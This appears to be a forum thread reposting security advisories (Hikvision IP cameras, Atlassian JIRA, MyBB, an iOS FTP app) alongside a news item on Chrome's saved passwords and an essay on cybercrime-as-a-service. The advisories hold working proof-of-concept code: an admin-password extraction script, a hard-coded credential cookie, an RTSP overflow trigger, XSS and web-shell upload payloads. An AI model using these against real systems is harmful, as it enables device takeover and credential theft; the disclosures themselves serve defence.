Matt

Description : Core Security Technologies Advisory - Hikvision IP Cameras suffer from buffer overflow, authentication bypass, hard-coded credential, and privilege escalation vulnerabilities. Author : Alberto Solino, Core Security Technologies, Anibal Sacco, Alejandro Rodriguez Source : Hikvision IP Cameras Overflow / Bypass / Privilege Escalation ? Packet Storm Code : Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Hikvision IP Cameras Multiple Vulnerabilities 1. *Advisory Information* Title: Hikvision IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0708 Advisory URL: http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities Date published: 2013-08-06 Date of last update: 2013-08-06 Vendors contacted: Hikvision Release mode: User release 2. *Vulnerability Information* Class: Input validation error [CWE-20], Use of Hard-coded Credentials [CWE-798], Buffer overflow [CWE-119] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4975, CVE-2013-4976, CVE-2013-4977 3. *Vulnerability Description* Multiple vulnerabilities have been found in Hikvision IP camera DS-2CD7153-E [1] (and potentially other cameras sharing the affected firmware [2]) that could allow a remote attacker: 1. [CVE-2013-4975] To obtain the admin password from a non-privileged user account. 2. [CVE-2013-4976] To bypass the anonymous user authentication using hard-coded credentials (even if the built-in anonymous user account was explicitly disabled). 3. [CVE-2013-4977] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP packet handler. 4. *Vulnerable Packages* . Hikvision-DS-2CD7153-E IP camera with firmware v4.1.0 b130111 (Jan 2013). . Other devices based on the same firmware [2] are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* There was no official answer from Hikvision after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be: . Do not expose the camera to internet unless absolutely necessary. . Have at least one proxy filtering HTTP requests to '/PSIA/System/ConfigurationData'. . Have at least one proxy filtering the 'Range' parameter in RTSP requests. 6. *Credits* . [CVE-2013-4975] was discovered and researched by Alberto Solino from Core Security. . [CVE-2013-4976] was discovered and researched by Alejandro Rodriguez from Core Exploit QA Team. . [CVE-2013-4977] was discovered Anibal Sacco. Analysis and research by Anibal Sacco and Federico Muttis from Core Exploit Writers Team. . The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Privilege Escalation through ConfigurationData Request* [CVE-2013-4975] The following script allows obtaining the administrator password by requesting the camera's configuration data and breaking its trivial encryption. A valid user account is needed to launch the attack. /----- import urllib2 import base64 import argparse import sys def decrypt(config): # Important: We're assuming the last 4 bytes of the file's plaintext are # zero, hence there we have the key. There are other easy ways to # calculate this tho. print '[*] Decrypting config' key = config[-4:] plaintext = '' for i in range(len(config)/4): for j in range(4): plaintext += chr(ord(config[i*4+j]) ^ ord(key[j])) return plaintext def attack(target, username, password, output): base_url = 'http://' + target + '/PSIA/System/ConfigurationData' headers = { 'Authorization': 'Basic ' + base64.b64encode('%s:%s' %(username,password)) } print '[*] Attacking %s ' % target req = urllib2.Request(base_url, None, headers) try: response = urllib2.urlopen(req) config = response.read() except Exception, e: print e return plaintext = decrypt(config) print '[*] Writing output file %s' % output f = open(output, 'w') f.write(plaintext) f.close() user = plaintext[0x45A0:0x45A0+32] pwd = plaintext[0x45C0:0x45C0+16] print 'Probably the admin user is %s and the password is %s' % (user, pwd) print "If it doesn't make any sense, just do a strings of the output file" if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('target', action = 'store', help = 'target host to attack') parser.add_argument('username', action = 'store', help = 'username to be used to authenticate against target') parser.add_argument('password', action = 'store', help = "username's password") parser.add_argument('output', action = 'store', help = "filename to write the plaintext config") if len(sys.argv) == 1: parser.print_help() sys.exit(1) options = parser.parse_args() attack(options.target, options.username, options.password, options.output) -----/ 7.2. *Anonymous User Authentication Bypass* [CVE-2013-4976] The camera has a built-in anonymous account intended for guest users, but even when the feature is disabled it could be bypassed due to the usage of hardcoded credentials: /----- user: anonymous password: \177\177\177\177\177\177 -----/ The bypass cannot be used directly through the login form but rather by forging a cookie: 1. Load the login page to generate the initial cookies of the camera's webapp. 2. Use your preferred tool (for example Firebug on Firefox) to create a cookie with the name 'userInfoXX' (replace XX with the port where the webserver is running i.e. 'userInfo80'), path '/' and value 'YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw=='; this is the tuple 'user:pass' encoded in base64 explained above. 3. Request the URI 'http:/<ipcam>/doc/pages/main.asp', a page that should not be accessed without authentication if the anonymous user is disabled. There are several references to those hardcoded credentials in the cgis, but in particular the following snippet was found in '/doc/pages/scripts/login.js':: /----- 107: function DoLogin(){ (...) 166: $.cookie('userInfo'+m_lHttpPort,m_szUserPwdValue==""?Base64.encode("anonymous:\177\177\177\177\177\177" ):m_szUserPwdValue); (...) -----/ This bypass is not completely useful per se since all the interesting requests are actually handled by the PSIA (Physical Security Interoperability Alliance's) API. Nevertheless, if it is ever combined with a privilege escalation it would allow remote attacker to control the camera without proper credentials. 7.3. *Buffer Overflow in the RTSP Packet Handler* [CVE-2013-4977] The following Python script sends a specially crafted packet that triggers a buffer overrun condition when handling the 'Range' parameter of a RTSP transaction. As a result, the process handling the communication crashes and the Watchdog service issues a full restart. No authentication is required to exploit this vulnerability and it would possible lead to a remote code execution. /----- import socket HOST = '192.168.1.100' PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST trigger_pkt += "CSeq: 7\r\n" trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n" trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n" s.sendall(trigger_pkt) print "Packet sent" data = s.recv(1024) print 'Received', repr(data), "\r\n" s.close() -----/ 8. *Report Timeline* . 2013-07-08: Core attempts to report the vulnerability using the Hikvision official contact addresses [3]. No reply received. . 2013-07-15: Core attempts to contact vendor. . 2013-07-22: Core attempts to contact vendor. . 2013-07-30: Core attempts to contact vendor. . 2013-08-06: Advisory CORE-2013-0708 published as 'user release'. 9. *References* [1] Hikvision DS-2CD7153-E Network Mini Dome Camera, http://www.hikvision.com/en/products_show.asp?id=506. [2] Hikvision IP cameras using firmware v4.1.0 b130111: DS-2CD833F-E DS-2CD893PF-E DS-2CD893PFWD-E DS-2CD893NF-E DS-2CD893NFWD-E DS-2CD863PF-E DS-2CD863NF-E DS-2CD864F-E DS-2CD864FWD-E DS-2CD853F-E DS-2CD855F-E DS-2CD854F-E DS-2CD854FWD-E DS-2CD883F-E DS-2CD733F-E DS-2CD733F-EZ DS-2CD793PF-E DS-2CD793PF-EZ DS-2CD793PFWD-E DS-2CD793PFWD-EZ DS-2CD793NF-E DS-2CD793NF-EZ DS-2CD793NFWD-E DS-2CD793NFWD-EZ DS-2CD763PF-E DS-2CD763PF-EZ DS-2CD763NF-E DS-2CD763NF-EZ DS-2CD764F-E DS-2CD764F-EZ DS-2CD764FWD-E DS-2CD764FWD-EZ DS-2CD753F-E DS-2CD753F-EZ DS-2CD755F-E DS-2CD755F-EZ DS-2CD754F-E DS-2CD754F-EZ DS-2CD754FWD-E DS-2CD783F-E DS-2CD783F-EZ DS-2CD733F-EI DS-2CD733F-EIZ DS-2CD793PF-EI DS-2CD793PF-EIZ DS-2CD793PFWD-EI DS-2CD793PFWD-EIZ DS-2CD793NF-EI DS-2CD793NF-EIZ DS-2CD793NFWD-EI DS-2CD793NFWD-EIZ DS-2CD763PF-EI DS-2CD763PF-EIZ DS-2CD763NF-EI DS-2CD763NF-EIZ DS-2CD764F-EI DS-2CD764F-EIZ DS-2CD764FWD-EI DS-2CD764FWD-EIZ DS-2CD753F-EI DS-2CD753F-EIZ DS-2CD755F-EI DS-2CD755F-EIZ DS-2CD754F-EI DS-2CD754F-EIZ DS-2CD754FWD-EI DS-2CD783F-EI DS-2CD783F-EIZ DS-2CD7233F-EZ DS-2CD7233F-EZH DS-2CD7233F-EZS DS-2CD7233F-EZHS DS-2CD7293PF-EZ DS-2CD7293PF-EZH DS-2CD7293PFWD-EZ DS-2CD7293PFWD-EZH DS-2CD7293NF-EZ DS-2CD7293NF-EZH DS-2CD7293NFWD-EZ DS-2CD7293NFWD-EZH DS-2CD7263PF-EZ DS-2CD7263PF-EZH DS-2CD7263PF-EZS DS-2CD7263PF-EZHS DS-2CD7263NF-EZ DS-2CD7263NF-EZH DS-2CD7263NF-EZS DS-2CD7263NF-EZHS DS-2CD7264FWD-EZ DS-2CD7264FWD-EZH DS-2CD7253F-EZ DS-2CD7253F-EZH DS-2CD7253F-EZS DS-2CD7253F-EZHS DS-2CD7255F-EZ DS-2CD7255F-EZH DS-2CD7254F-EZ DS-2CD7254F-EZH DS-2CD7254F-EZS DS-2CD7254F-EZHS DS-2CD7233F-EIZ DS-2CD7233F-EIZH DS-2CD7233F-EIZS DS-2CD7233F-EIZHS DS-2CD7293PF-EIZ DS-2CD7293PF-EIZH DS-2CD7293PFWD-EIZ DS-2CD7293PFWD-EIZH DS-2CD7293NF-EIZ DS-2CD7293NF-EZH DS-2CD7293NFWD-EIZ DS-2CD7293NFWD-EZH DS-2CD7263PF-EIZ DS-2CD7263PF-EIZH DS-2CD7263PF-EIZH DS-2CD7263PF-EIZHS DS-2CD7263NF-EIZ DS-2CD7263NF-EIZH DS-2CD7263NF-EIZH DS-2CD7263NF-EIZHS DS-2CD7264FWD-EIZ DS-2CD7264FWD-EIZH DS-2CD7253F-EIZ DS-2CD7253F-EIZH DS-2CD7253F-EIZS DS-2CD7253F-EIZHS DS-2CD7255F-EIZ DS-2CD7255F-EIZH DS-2CD7254F-EIZ DS-2CD7254F-EIZH DS-2CD7254F-EIZH DS-2CD7254F-EIZHS DS-2CD7133-E DS-2CD8133F-E DS-2CD8133F-EI DS-2CD7164-E DS-2CD7153-E DS-2CD8153F-E DS-2CD8153F-EI DS-2CD8233F-E DS-2CD8233F-ES DS-2CD8264F-E DS-2CD8264FWD-E DS-2CD8264FWD-ES DS-2CD8253F-E DS-2CD8253F-ES DS-2CD8255F-E DS-2CD8254F-E DS-2CD8254F-ES DS-2CD8283F-E DS-2CD8283F-ES DS-2CD8233F-EI DS-2CD8233F-EIS DS-2CD8264F-EI DS-2CD8264FWD-EI DS-2CD8264FWD-EIS DS-2CD8253F-EI DS-2CD8253F-EIS DS-2CD8255F-EI DS-2CD8254F-EI DS-2CD8254F-EIS DS-2CD8283F-EI DS-2CD8283F-EIS DS-2CD8433F-EI DS-2CD8464F-EI. [3] Hikvision contact page, http://www.hikvision.com/En/US/contactHikvision.asp. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Description : Atlassian JIRA suffers from a reflective cross site scripting issue due to a failure to properly sanitize user-supplied input to the 'name' GET parameter in the 'deleteuserconfirm.jsp' script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Versions 6.0.2 and 6.0.3 are affected. Author : LiquidWorm Source : Atlassian JIRA 6.0.3 Cross Site Scripting ? Packet Storm Code : Atlassian JIRA v6.0.3 Arbitrary HTML/Script Execution Vulnerability Vendor: Atlassian Corporation Pty Ltd. Product web page: https://www.atlassian.com Affected version: 6.0.3 and 6.0.2 Summary: JIRA is an issue tracking project management software for teams planning, building, and launching great products. Desc: JIRA suffers from a reflected XSS issue due to a failure to properly sanitize user-supplied input to the 'name' GET parameter in the 'deleteuserconfirm.jsp' script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Vulnerable JSP script location: - jira-components/jira-webapp/src/main/webapp/secure/admin/user/views/deleteuserconfirm.jsp Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5151 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5151.php Vendor: https://jira.atlassian.com/browse/JRA-34160 https://jira.atlassian.com/browse/JRA/fixforversion/33790 https://jira.atlassian.com/browse/JRA/fixforversion/34310 25.06.2013 -- http://localhost:8080/secure/admin/user/DeleteUser!default.jspa?name=a"><script>alert(document.cookie);</script>&returnUrl=UserBrowser.jspa

Description : MyBB version 1.6.10 suffers from an arbitrary site redirection vulnerability. Author : LiquidWorm Source : MyBB 1.6.10 Open Redirection ? Packet Storm Code : MyBB 1.6.10 'url' Parameter Arbitrary Site Redirection Vulnerability Vendor: MyBB Group Product web page: http://www.mybb.com Affected version: 1.6.10 Summary: MyBB, also known as MyBBoard or MyBulletinBoard, is a powerful, efficient, and free forum package, developed using PHP and MySQL. Desc: Input passed via the 'url' parameter in 'member.php' script is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.7 MySQL 5.5.25a Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5152 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5152.php 02.08.2013 --- POST /mybb/member.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/mybb/index.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 133 action=do_login&url=http://www.zeroscience.mk&quick_login=1&quick_username=admin&quick_password=admin&submit=Login&quick_remember=yes

Ai putea sa faci un concurs iar ca premiu sa le dai cartea.

https://www.dropbox.com/s/hv093d85p5u649q/cisco%20systems%20-%20implementing%20cisco%20voice%20gateways%20and%20gatekeepers.%20student%20guide%20v1.0.pdf?m

Security researchers say the plain text used to display Web site passwords leaves Chrome vulnerable, but Google defends its strategy. Another person with access to your computer can see your Google Chrome saved passwords through a simple series of steps. Should you be worried? The security flaw was highlighted in a blog posted Tuesday by software developer Elliot Kember. In his blog, Kember described how your saved passwords in Chrome can be revealed in plain text, a process that any Chrome user can replicate. In Chrome, click on the Settings icon, and then click on the Settings command from the pop-menu. In the Settings screen, click on the link to Show Advanced Settings. In the Passwords and Forms section, confirm that the option to "Offer to save passwords I enter on the web" is turned on. Click on the link to Manage Saved passwords. Any Web sites for which you opted to save your password appear on the list. By default, the password is hidden by the usual series of asterisks. But simply click on the site name, click on the Show button, and your password appears in clear text. Chrome users who lock down their computers may be safer than others. You can also turn off the ability to save passwords or simply say no when the browser asks. But the option is turned on by default. And imagine a scenario of shared or public computers, or a person who loses an unsecured laptop. Kember called this an "insane password security strategy," criticizing Google for not even offering a master password option before someone can peek at all your saved passwords. What is Google's response? In a post on Web site Hacker News, Chrome security head Justin Schuh defended the lack of a master password: Others, though, clearly disagree with Schuh. Many responded to Schuh's post by arguing that not offering a master password or telling users that their passwords can appear in clear text gives them a false sense of security. Even famed Web inventor Tim Berners-Lee jumped in to express his frustration, tweeting: "How to get all [your] big sister's passwords Chrome’s insane password security strategy • elliottkember ... and a disappointing reply from Chrome team." Other browsers have been caught in a similar predicament but resolved the issue, according to The Guardian. In 2010, Mozilla added a master password option to Firefox, while Safari requires its users to enter a master password before revealing stored passwords. Certain versions of Internet Explorer also had the same flaw, The Guardian added. For now, concerned Chrome users should disable the save password option and perhaps consider a third-party tool such as RoboForm or LastPass to better manage their passwords. Sursa News.cnet.com

Author : Vulnerability-Lab Code : Title: ====== FTP OnConnect v1.4.11 iOS - Multiple Web Vulnerabilities Date: ===== 2013-08-04 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1041 VL-ID: ===== 1041 Common Vulnerability Scoring System: ==================================== 8.6 Introduction: ============= Simultaneous connections, and directory caching improves the work efficiency and save your time. Transmission Manager feature is easier and more efficient transmission to be managed. Supports FTP / SFTP / FTPS (Explicit FTP over TLS, Implicit FTP over TLS) connection. SFTP Private key authentication. name/password authentication is also supported. ( Copy of the Homepage: https://itunes.apple.com/us/app/ftp-onconnect-free-ftp-sftp/id594722236 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a command/path inject vulnerability in the FTP OnConnect v1.4.11 application (Apple iOS - iPad & iPhone). Report-Timeline: ================ 2013-08-04: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Apple AppStore Product: FTP OnConnect - Mobile Application 1.4.11 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== 1.1 A file include web vulnerability is detected in the FTP OnConnect v1.4.11 mobile application (Apple iOS - iPad & iPhone). The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service. The vulnerability is located in the upload module when processing to upload files with manipulated filenames in the POST method request & header. The attacker can inject local path or files to request context and compromise the mobile device or ftp service. The validation has a bad side effect which impacts the risk to combine the attack with persistent injected script code. Exploitation of the local file include web vulnerability requires no user interaction or privilege application user account with password. Successful exploitation of the vulnerability results in unauthorized local file and path requests to compromise the device or application. Vulnerable Application(s): [+] FTP OnConnect v1.4.11 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Upload (Files) - (http://localhost:50000) Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing 1.2 An arbitrary file upload web vulnerability is detected in the FTP OnConnect v1.4.11 mobile application (Apple iOS - iPad & iPhone). The arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access. The vulnerability is located in the upload module when processing to upload files with multiple ending extensions. Attackers are able to upload a php or js web-shells by renaming the file with multiple extensions. The attacker uploads for example a web-shell with the following name and extension image.jpg.js.php.jpg . At the end the attacker deletes in the request after the upload the jpg to access unauthorized the malicious file (web-shell) to compromise the web-server or mobile device. Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. Vulnerable Application(s): [+] FTP OnConnect v1.4.11 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Upload (Files) - (http://localhost:50000) Vulnerable Parameter(s): [+] filename (multiple extensions) Affected Module(s): [+] Index File Dir Listing 1.3 A persistent input validation web vulnerability is detected in the Private Photos v1.0 application (Apple iOS - iPad & iPhone). The bug allows an attacker (remote) to implement/inject malicious own malicious persistent script codes (application side). The vulnerability is located in the add `New Folder` module of the web-server (http://localhost:50000) application when processing to inject via POST method request manipulated `folder-names`. The folder name will be changed to the path value without secure filter, encoding or parse mechanism. The injected script code will be executed in the path listing context and of course also in the index file dir listing of the mobile ftp web application interface. Exploitation of the persistent web vulnerability requires low user interaction and a local low privilege mobile application account with a password. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or persistent module context manipulation. Vulnerable Application(s): [+] FTP OnConnect v1.4.11 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] New Folder - (http://localhost:50000/?dir=) Vulnerable Parameter(s): [+] foldername Affected Module(s): [+] Index File Dir Listing [+] Path/Folder Listing Proof of Concept: ================= 1.1 The local file include web vulnerability can be exploited by remote attackers without privilege application user account and also without user interaction. For demonstration or reproduce ... PoC: <tr class="shadow"><td><a href="/download.html?dir=%2F&name=[LOCAL FILE/PATH INCLUDE VULNERABILITY!]" class="file">../var/mobile/[LOCAL FILE/PATH INCLUDE VULNERABILITY!].*</a></td><td>95.8 KB</td><td>3. August 2013 18:29</td> <td><form action="/delete.html?fileType=f&dir=%2F&name=../var/mobile/[LOCAL FILE/PATH INCLUDE VULNERABILITY!].*" method="post"><input name="_method" value="Delete" type="hidden"><input name="commit" value=" Delete " class="button" type="submit"> <input name="rename" value=" Rename " onclick="renameFunction('f','%2F','../var/mobile/[LOCAL FILE/PATH INCLUDE VULNERABILITY!].*')" class="button" type="BUTTON"></form></td></tr> --- Request Session Log POST --- Status: 200[OK] POST http://192.168.2.104:50000/upload.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[0] Mime Type[application/x-unknown-content-type] Request Headers: Host[192.168.2.104:50000] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://192.168.2.104:50000/index.html?dir=%2F] Connection[keep-alive] Post Data: POST_DATA[-----------------------------7857615028463 Content-Disposition: form-data; name="newfile"; filename="../var/mobile/[LOCAL FILE/PATH INCLUDE VULNERABILITY!].*" Content-Type: image/png Note: After the inject the remote attacker can open up the index file dir listing to execute the unauthorized file/path request. 1.2 The arbitrary file upload web vulnerability can be exploited by remote attackers without privilege application user account and also without user interaction. For demonstration or reproduce ... PoC: <tr class="shadow"><td><a href="/download.html?dir=%2F&name=1234.png.txt.iso.php.js.html.gif" class="file">1234.png.txt.iso.php.js.html.gif</a></td><td>95.8 KB</td><td>3. August 2013 18:29</td> <td><form action="/delete.html?fileType=f&dir=%2F&name=1234.png.txt.iso.php.js.html.gif" method="post"><input name="_method" value="Delete" type="hidden"><input name="commit" value=" Delete " class="button" type="submit"> <input name="rename" value=" Rename " onclick="renameFunction('f','%2F','1234.png.txt.iso.php.js.html.gif')" class="button" type="BUTTON"></form></td></tr> --- Request Session Log POST --- Status: 200[OK] POST http://192.168.2.104:50000/upload.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[0] Mime Type[application/x-unknown-content-type] Request Headers: Host[192.168.2.104:50000] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://192.168.2.104:50000/index.html?dir=%2F] Connection[keep-alive] Post Data: POST_DATA[-----------------------------7857615028463 Content-Disposition: form-data; name="newfile"; filename="1234.png.txt.iso.php.js.html.gif" Content-Type: image/gif Note: After the inject the attacker can easily visit the main index website and open the ?dir= folder listing by attaching the filename with the multi extension. After the first request the attacker opens the file the regular way without the parameter ?dir (path) to execute without download. 1.3 The persistent input validation web vulnerability can be exploited by remote attackers without privilege application user account and with low user interaction. For demonstration or reproduce ... PoC: New Folder - Index File Dir Listing <table border="0" cellpadding="0" cellspacing="0"> <thead> <tr><th>Name</th><th class="sizeStr">Size</th><th class="dateStr">Date</th><th class="actionStr">Action</th></tr> </thead> <tbody id="filelist"><tr><td><a href="http://192.168.2.104:50000/index.html?dir=%2F%3E%22%3Ciframe%20src%3Da%3E" class="file"><>"<iframe src="FTP%20On%20Connect%20File%20Management-foldername_files/a.txt"> ></a></td><td>0 byte</td><td>3. August 2013 14:43</td><td><form action='/delete.html?fileType=d&dir=%2F%3E%22%3Ciframe%20src%3Da%3E' method='post'><input name='_method' value='Delete' type='hidden'/><input name="commit" type="submit" value=" Delete " class='button'/> <input name="rename" value=" Rename " type="BUTTON" onclick="renameFunction('d','%2F%3E%22%3Ciframe%20src%3Da%3E','%3E%22%3Ciframe%20src%3Da%3E')" class='button'/></form></td></tr></tbody></table></iframe></a></td></tr> --- Request Session Log GET --- Status: 200[OK] GET http://192.168.2.104:50000/newFolder.html?folderName=%3E%22%3Ciframe%20src%3Da%20onload%3Dalert(%22HITHOMAS%22)%3C%3E Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[0] Mime Type[application/x-unknown-content-type] Request Headers: Host[192.168.2.104:50000] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://192.168.2.104:50000/index.html?dir=%2FMAINPENTESTFOLDER] Connection[keep-alive] Response Headers: Accept-Ranges[bytes] Content-Length[0] Location[http://192.168.2.104:50000/index.html?dir=/MAINPENTESTFOLDER/] Date[Sat, 03 Aug 2013 12:52:13 GMT] Note: After the inject the folder can only be deleted by the device itself because the functions are not anymore available. Exploitation of the issue does also work via rename without the add function. Solution: ========= 1.1 - 1.2 The vulnerabilities can be patched by a secure file name input restriction and filter when processing to upload. Parse and encode the filename input of the file upload POST method request. Parse and encode the output file listing of the filename even if the input is restricted. Disallow double extensions by setting a restriction to `.` on file uploads. 1.2 The persistent input validation can be parsed by a secure encode of the foldername input and output listing. It is also required to setup a restriction to the foldername input to prevent the include of special chars or script codes. Risk: ===== 1.1 The security risk of the local file include web vulnerability is estimated as high(+). 1.2 The security risk of the arbitrary file upload web vulnerability is estimated as critical. 1.3 The security risk of the persistent input validation web vulnerability is estimated as high(-). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright ? 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com

Reading about cybercrime, it is very easy to find terms such as attacks-as-a-service, malware-as-a-service and fraud-as-s-Service, that are commonly used to describe the practice of facilitating illegal activities for cybercriminals through the provisioning of services. Security experts working for principal security firms have observed a radical change in the way cybercriminals monetize their activities; instead of earning directly from the sale of illegal products such as malware and exploit kits, the cybercriminals are evolving to respond to a demand in rapid and constant growth. Cybercriminals in fact offer everything necessary to arrange a cyber fraud or to conduct a cyber attack; the offer is very articulated and includes malicious code and also the infrastructure to control the spreading and operation of the malware (e.g., bullet-proof hosting or rental of compromised machines belonging to huge botnets). These models of sale defined as cybercrime-as-a-service represent the natural evolution of the offer in the underground, criminals can extend their activities to cyberspace easily and without great investment. The diffusion of such a sales model allows cybercriminals without considerable technical expertise to operate; they just need to have money to acquire all they need, including tools and services. A recent research showed that 17% of European citizens have been victims of identity theft, costing an average of £1,076; the study revealed that there is a strict correlation between the increase of cyber attacks against private citizens and businesses and the availability of tools, exploit kits, and services sold on the black market. As said on various occasions, the approach to fraudulent activities is becoming even more complete and efficient. When we debated in the past about fraud-as-a-service schemes, we identified the various components for the supply chain management outsourcing/partnerships for illegal services (e.g., hacking services, hosting), software development, distribution of malicious agents, and, of course, customer support. In many cases, post-sales service has also been observed; cybercriminals are able to remain in direct contact with the customers to collect information from the field and suggestions for improving their services. Most services offered in the underground are characterized by their ease of use and a strong customer orientation. They typically have a user-friendly administration console and dashboard for the control of profits. The cost of arrangements for criminal activities is shared between all customers, thanks to a model based on a subscription or flat-rate fee, making cybercriminal services convenient and attractive. In this scenario, service providers could increase their earnings and clients benefit from a sensible reduction in terms of the expense and knowledge needed to manage the illegal business. The security community is aware of the immense possibilities of cybercrime, an underground economy that is able to support those models of sales and that is reaching extraordinary figures. The cloud computing paradigm has brought numerous advantages to IT industry but also new interesting opportunities for cybercriminals, with the term “attacks-as-a-service” referring to the ability of criminal organizations to offer hacking services, in the majority of cases exploiting cloud-based architectures. 